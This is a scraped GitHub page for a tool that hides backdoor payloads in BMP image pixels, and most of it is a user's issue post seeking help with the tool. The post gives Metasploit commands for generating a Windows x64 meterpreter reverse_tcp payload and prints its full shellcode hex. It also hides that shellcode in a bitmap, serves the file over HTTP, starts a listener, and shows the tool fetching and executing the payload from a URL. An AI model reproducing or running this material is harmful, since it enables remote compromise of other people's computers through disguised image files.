damonmohammadbagher / nativepayload_image Goto Github PK
View Code? Open in Web Editor NEWTransferring Backdoor Payloads with BMP Image Pixels
Transferring Backdoor Payloads with BMP Image Pixels
hi, thank you for your sharing such stuff
can i edit the source code to accept Injecting Meterpreter Payload size !
i get error wen try to inject payload size=5855 bytes Segmentation fault !
thank you very match
" step1 : msfconsole
step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp
step3 : set lhost 192.168.1.104
step4 : generate
finally you can use stage1 "
then
NativePayload_Image.exe create “test3.bmp” fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,01,68,41,54,49,89,e4,4c,89,f1,41,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74,61,ff,d5,85,c0,74,0c,49,ff,ce,75,e5,68,f0,b5,a2,56,ff,d5,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,01,c3,48,29,c6,48,85,f6,75,e1,41,ff,e7
[!] Making New Bitmap File ...
[!] Bitmap File Name : test3.bmp
[+] Creating Header for Bitmap File ...
[>] Header adding (length 54) : 424d5e0e00000000000036000000280000........
[+] Injecting Meterpreter Payload to Bitmap File ...
[>] Injecting Payload (length 449) : fc4883e4f0e8cc00000041514150525156........
[+] Adding Ex-Payload for Bitmap File ...
[>] Ex-Payload adding (length FF * 3114).
[!] File test3.bmp with length 4621 bytes Created.
then
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.104
exploit
then
cp test3.bmp /var/www/html/
then download and open file from another computer (windows x64 architecture) in local network and no one session appear...
or...
when i want to publish as url:
**./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 510 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017
Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 510 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception:
System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0**
could You help me please?
Hello, thanks for sharing this great knowledge, i want to ask if there is a way to automate the removal of 0x in the generated payload like below
0xfc , 0x48 , 0x83 “ to fc,48,83
thanks
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.